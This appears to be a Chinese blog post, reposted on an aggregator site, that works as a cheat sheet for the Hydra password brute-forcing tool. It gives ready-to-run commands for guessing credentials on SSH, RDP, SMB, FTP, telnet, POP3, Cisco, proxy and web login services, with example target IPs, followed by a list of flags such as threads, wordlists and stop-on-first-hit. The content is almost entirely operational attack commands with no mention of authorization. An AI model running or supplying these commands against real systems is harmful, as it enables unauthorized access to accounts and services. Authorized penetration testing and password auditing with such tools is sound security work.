渗透工具——Hydra破解弱密码

Posted Thgilil

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了渗透工具——Hydra破解弱密码相关的知识,希望对你有一定的参考价值。

Hydra是一个自动化爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,kali中以集成。

1.对ssh进行爆破

hydra -L user.txt -P password.txt ssh://192.168.3.163

-s 指定端口

hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 7744

2.将破解密码保存到指定文件

hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 40 -o ssh.txt

使用hydra破解ssh的密码

hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https:

hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:

hydra -P pass.txt IP cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:

hydra -l administrator -P pass.txt IP smb

破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp

hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet

hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp:

hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get

重要参数:

-s    Port 使用非默认服务器端口而是其他端口时,指定其端口
-l    Login 已经获取登录ID的情况下输入登录ID
-L    FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)
-p    Pass 已经获取登录密码的情况下输入登录密码
-P    FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)
-f    查找到第一个可以使用的ID和密码的时候停止破解
-o    FILE以STDOUT的形式输出结果值
-t 指定多线程数量,默认为16个线程


-R    修复之前使用的aborted/crashed session
-S    执行SSL(Secure Socket Layer)连接
-w    指定每个线程的回应时间(Waittime)(默认值:32秒)
-U    查看服务器组件使用明细
-4/6  指定IPv4/IPv6(默认值:IPv4)
-C    FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式
-x    MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解

以上是关于渗透工具——Hydra破解弱密码的主要内容,如果未能解决你的问题,请参考以下文章

渗透工具——Hydra破解弱密码

渗透测试密码暴力破解工具——九头蛇(hydra)使用详解及实战

渗透测试密码暴力破解工具——九头蛇(hydra)使用详解及实战

centos7.4安装配置弱密码审计工具hydra详解

网络安全暴力破解工具—九头蛇(hydra)使用详解及实战

[端口安全]Hydra密码爆破